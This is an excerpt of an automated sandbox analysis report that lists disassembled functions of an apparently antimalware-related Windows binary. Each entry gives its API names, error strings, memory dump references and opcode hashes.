                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Intersect$Empty$ColorText
                                                                            • String ID:
                                                                            • API String ID: 1058108-0
                                                                            • Opcode ID: e6845464937a91cd32bc10ae8e108abd7035b1b1fd72c6295f984480cb704b5e
                                                                            • Instruction ID: 0cc79926276537c99997dfb8c4d36c348ed4c6e682c73a9456f0f32ef1d67f61
                                                                            • Opcode Fuzzy Hash: e6845464937a91cd32bc10ae8e108abd7035b1b1fd72c6295f984480cb704b5e
                                                                            • Instruction Fuzzy Hash: 4212B076B10A8486EB12DF26E8447ED63A1F78CF88F48422ADF4967BA5DF38C545C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017C7C4 Relevance: 16.8, APIs: 11, Instructions: 279windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ColorConditionInflateMaskObjectRectSelect$InfoMetricsSystemTextVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 4253551672-0
                                                                            • Opcode ID: 6a1add606dab6be897c190eecc6c4f0df1757a9691ffb258ab2a183d665a0945
                                                                            • Instruction ID: ca59eb07bfc7c55210e25ff9bcfeacde9c451ebb73a1793a27859a9ae15ea39c
                                                                            • Opcode Fuzzy Hash: 6a1add606dab6be897c190eecc6c4f0df1757a9691ffb258ab2a183d665a0945
                                                                            • Instruction Fuzzy Hash: 6AC17F76A106808BE721DF27E458B99BBA0F38CB98F048119EF5957BA4CF78D841CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014015A4CC Relevance: 16.7, APIs: 11, Instructions: 196keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Capture$ClientRectScreen$AsyncCursorMetricsParentReleaseStateSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 668609343-0
                                                                            • Opcode ID: 29a662a459f07e9b3f836a917a264d3e24cf87d1ff9f4ed4f177efe94b3f3f43
                                                                            • Instruction ID: 05afd8aefdcc5f09ac6a23b73f676dad12516db32ec77fafd39371f369ac0628
                                                                            • Opcode Fuzzy Hash: 29a662a459f07e9b3f836a917a264d3e24cf87d1ff9f4ed4f177efe94b3f3f43
                                                                            • Instruction Fuzzy Hash: 17817C7671578086EB26DBB6E8947ED27B1B74CF84F084026DF8A5BBA5DE39C441C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140026310 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: AtlAdvise() failed and returned 0x%08X$CServerConnection::ISBScanControlInterface$CreateInstance(IUnknown sink delegate class) failed and returned 0x%08X$Failed to get the ServerConnection instance.$Failed to subscribe to ServerConnection state changes.$QueryInterface(IUnknown sink delegate class) failed and returned 0x%08X$SBAM.Common$Successfully subscribed to ServerConnection state changes.$TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBScanControl,&struct __s_GUID const _GUID_bbed8229_eb89_4853_b66a_39$There is no connection to the SBAM service. Not advising.
                                                                            • API String ID: 432778473-3567450281
                                                                            • Opcode ID: f1132e3db1ee851c7aa6a805d2b220358e27b0953dd71ad65e4a0da5fc31e84e
                                                                            • Instruction ID: 6f31c54e3296ce0b57a1d820e01a7ea196c973fec8fd8efb65a447e78071ab93
                                                                            • Opcode Fuzzy Hash: f1132e3db1ee851c7aa6a805d2b220358e27b0953dd71ad65e4a0da5fc31e84e
                                                                            • Instruction Fuzzy Hash: DA617E76100A9591FB22EF33E844BC96364F74C798F508516EB59832F5DFB8CA45C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140026770 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow
                                                                            • String ID: AtlAdvise() failed and returned 0x%08X$CServerConnection::ISBThreatDefinitionsInterface$CreateInstance(IUnknown sink delegate class) failed and returned 0x%08X$Failed to get the ServerConnection instance.$Failed to subscribe to ServerConnection state changes.$QueryInterface(IUnknown sink delegate class) failed and returned 0x%08X$SBAM.Common$Successfully subscribed to ServerConnection state changes.$TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBThreatDefinitions,&struct __s_GUID const _GUID_e426c725_b8ce_406a_9$There is no connection to the SBAM service. Not advising.
                                                                            • API String ID: 432778473-2209108740
                                                                            • Opcode ID: 87ee1c8e97dd53fbfe71bb23bfc25e6639226938038c4be17dfb130e074b4eb9
                                                                            • Instruction ID: 1d87a63bdc42cdc0d0fc18a1aced181bd28b350b14c826fd744a6dc1a2d4c070
                                                                            • Opcode Fuzzy Hash: 87ee1c8e97dd53fbfe71bb23bfc25e6639226938038c4be17dfb130e074b4eb9
                                                                            • Instruction Fuzzy Hash: 09617D76104B8681FA22EF33E488BC96365F74C798F908116EB59436F5DFB8CA85C391
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401A8060 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Create$EqualWindow$CombineIndirectRedraw
                                                                            • String ID: X
                                                                            • API String ID: 1400420921-3081909835
                                                                            • Opcode ID: 4519524f506afe1a51b2d19334bc70a0a419ba9bfd65e895bae58f33c3e024ab
                                                                            • Instruction ID: a82b96e196c48fb7f406e054c761b6a5117a70d7c7c7e256bb64d18451693267
                                                                            • Opcode Fuzzy Hash: 4519524f506afe1a51b2d19334bc70a0a419ba9bfd65e895bae58f33c3e024ab
                                                                            • Instruction Fuzzy Hash: AF518D767106908AE715CF66E948BEE77B0F75CB98F148124DF9A17AA8DF38D484CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400DE578 Relevance: 15.3, APIs: 10, Instructions: 275windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InflateRect
                                                                            • String ID:
                                                                            • API String ID: 2073123975-0
                                                                            • Opcode ID: 8b556cc825b79c826b2b1dc0784fc03dced48f5989e53aae9eeb3e53bbaf029b
                                                                            • Instruction ID: db9e63b8d2182378be00c8c08826e6456dd29741eb76c1e728c8a67cc08d0a0a
                                                                            • Opcode Fuzzy Hash: 8b556cc825b79c826b2b1dc0784fc03dced48f5989e53aae9eeb3e53bbaf029b
                                                                            • Instruction Fuzzy Hash: 1BC188766146808BE721DF27E444B9DBB60F789BD4F148225EF9847B68DF38D842CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401125BC Relevance: 15.2, APIs: 10, Instructions: 243COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CopyParentWindow
                                                                            • String ID:
                                                                            • API String ID: 642869531-0
                                                                            • Opcode ID: b122544f1e3ecdfed08cbb4ca23f8fd38f4dbc316605581de163c0d2c8ebb641
                                                                            • Instruction ID: 7c46f071e3dcc1a64aa52229fe20fea41dedef27c8f38e99f302925d6d22888b
                                                                            • Opcode Fuzzy Hash: b122544f1e3ecdfed08cbb4ca23f8fd38f4dbc316605581de163c0d2c8ebb641
                                                                            • Instruction Fuzzy Hash: BCB11976B106508AEB0ACF76D5447EE3BB1B74CB98F144515DF0AABBA8DB38D854CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400D63E4 Relevance: 15.2, APIs: 10, Instructions: 241COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CursorInfoMonitor$CopyEqualExtentFromInvalidateLoadParametersPointPoint32SystemTextUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 321205079-0
                                                                            • Opcode ID: 6763386de9334c7cb0d8c1d6a72666ed43279b6fa854cd6698aa9b42112c7a6b
                                                                            • Instruction ID: e4887efaeef2a1af96c7ac47cf22bf81dc3e1aeb0e456f061d257a43b5b6f21f
                                                                            • Opcode Fuzzy Hash: 6763386de9334c7cb0d8c1d6a72666ed43279b6fa854cd6698aa9b42112c7a6b
                                                                            • Instruction Fuzzy Hash: 00B17D727006908AEB16DF7AD458BED37A5FB88798F428125EF09576A5EF38C445CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400AE788 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$PointsRectWindow$ClientParentScroll
                                                                            • String ID:
                                                                            • API String ID: 3278275472-0
                                                                            • Opcode ID: b7a733b981df26b836237ec0e030c84bec98d52e5496d781637e799c9078919b
                                                                            • Instruction ID: 7548646a0b7c1f83116ac4ca6e88faafb4787589d70e6750a895f98de59cd08e
                                                                            • Opcode Fuzzy Hash: b7a733b981df26b836237ec0e030c84bec98d52e5496d781637e799c9078919b
                                                                            • Instruction Fuzzy Hash: 03718D36300A8086EB5ADB67E8587ED2761F79CBC8F044122EF0D47BA5DF79C9928740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140172288 Relevance: 15.1, APIs: 10, Instructions: 120windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$CaptureWindow$BringCursorDispatchForegroundIndexInvalidateNearestPalettePeekRectReleaseTranslateWaitstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 95895181-0
                                                                            • Opcode ID: 3aa49993715ade2b147aa35eaa6107bf3c374193b2d4a07edba91201ee2da320
                                                                            • Instruction ID: f79edc5a27591c83c39bc4441d99a052ddf0a52bac6dbb4334e5183e713d6c20
                                                                            • Opcode Fuzzy Hash: 3aa49993715ade2b147aa35eaa6107bf3c374193b2d4a07edba91201ee2da320
                                                                            • Instruction Fuzzy Hash: AC515936305A8082FA6ADB27E4587ED63A1FB8DF90F184121DB9A477B1DF78C846C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014014287C Relevance: 15.1, APIs: 10, Instructions: 104windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Focus$Window$MessageRedrawSendVisible
                                                                            • String ID:
                                                                            • API String ID: 1465349162-0
                                                                            • Opcode ID: a0f8e752c7d6c951b02b81b95f304dfc7ec780fbd6279938dd5100218ac1065a
                                                                            • Instruction ID: 14901e82cffdc99a242cf5dae896e81aa1fedd9404aead98bb5372caa3a691ae
                                                                            • Opcode Fuzzy Hash: a0f8e752c7d6c951b02b81b95f304dfc7ec780fbd6279938dd5100218ac1065a
                                                                            • Instruction Fuzzy Hash: BD411C3531165142EE1AEB63E8993EA63A1BBCDFC0F494135DF4E4B7B2DE78D4418200
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400E43F8 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 349COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Rect$Fill$InflateWindow
                                                                            • String ID: 2
                                                                            • API String ID: 3037358875-450215437
                                                                            • Opcode ID: 58061f454942a40bfbdb045d28eea74754b22fdfa9c1d6114f031c37b4fb75ef
                                                                            • Instruction ID: 1dd9f4106f79d29d9a3bb3df1d60e60a47b9dcd5ce4814544ed0c9883effd920
                                                                            • Opcode Fuzzy Hash: 58061f454942a40bfbdb045d28eea74754b22fdfa9c1d6114f031c37b4fb75ef
                                                                            • Instruction Fuzzy Hash: 6AF17B32B04A808AEB12DFA6E4447ED23B1B78DBD8F455216EF49677A5EF34C544C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400B8584 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 259windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleConditionCreateHashMaskObject$BitmapDeleteImplImpl::InfoMetricsSelectSystemVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 821148471-3916222277
                                                                            • Opcode ID: 35b1456f474780a5decac3009dde12970bc71ffba1bfa3b31348209189299bbd
                                                                            • Instruction ID: ae8a37201005f473de6899875b8a4f25387225d58a64c4c8302452e398a6f266
                                                                            • Opcode Fuzzy Hash: 35b1456f474780a5decac3009dde12970bc71ffba1bfa3b31348209189299bbd
                                                                            • Instruction Fuzzy Hash: 31B19F36714A509AEB22DFB6D8547ED37B0F748798F504229EF4A97AB9DB38C805C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140154660 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 258windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
